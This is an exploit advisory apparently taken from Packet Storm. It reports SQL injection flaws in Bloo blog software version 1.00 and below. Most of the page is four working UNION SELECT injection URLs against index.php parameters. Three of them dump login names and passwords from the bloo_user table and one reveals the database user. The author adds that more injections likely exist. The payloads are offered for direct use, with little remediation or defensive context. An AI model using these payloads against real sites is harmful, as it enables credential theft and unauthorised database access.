Bloo versions 1.00 and below suffer from multiple SQL injection vulnerabilities.
bd9709dd66c18dcb22788826246a41ee06eb3aa1e278eed4ae0890ce6f4257b7--==+================================================================================+==--
--==+ Bloo - Object Oriented Blog Software <= v.1.00 Remote Sql Injection +==--
--==+================================================================================+==--
Author: MhZ91
Title: Bloo - Object Oriented Blog Software <= v.1.00 Remote Sql Injection
Download: http://sourceforge.net/project/showfiles.php?group_id=160870
Bug: Remote Sql Injection
Info: Bloo is a free, public-domain, object-oriented implementation of full-featured blog software, based on the Phoo Phramework. You can visit the Bloo home wiki at http://outofthebloo.com.
Visit: http://www.inj3ct-it.org
[*]----------------------------------------------------------
Bloo - Object Oriented Blog Software <= v.1.00 present more sql injection...
http://www.example.com/index.php?post_id=1+union+select+1,concat(login_id,char(58),password),3,4,5,6,7,8+from+bloo_user/*
http://www.example.com/index.php?post_category_id=1+union+select+1,2,3,4,concat(login_id,char(58),password),6,7,8+from+bloo_user/*
http://www.example.com/index.php?post_year_month=[NumberIdOfExistentPost]+union+select+1,2,3,4,concat(login_id,char(58),password),6,7,8+from+bloo_user/*
http://www.example.com/index.php?static_page_id=1+union+select+1,user(),3,4,5,6/*
etc...
etc...
etc...
I think there are other sql injection in this blog lol
[*]----------------------------------------------------------
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed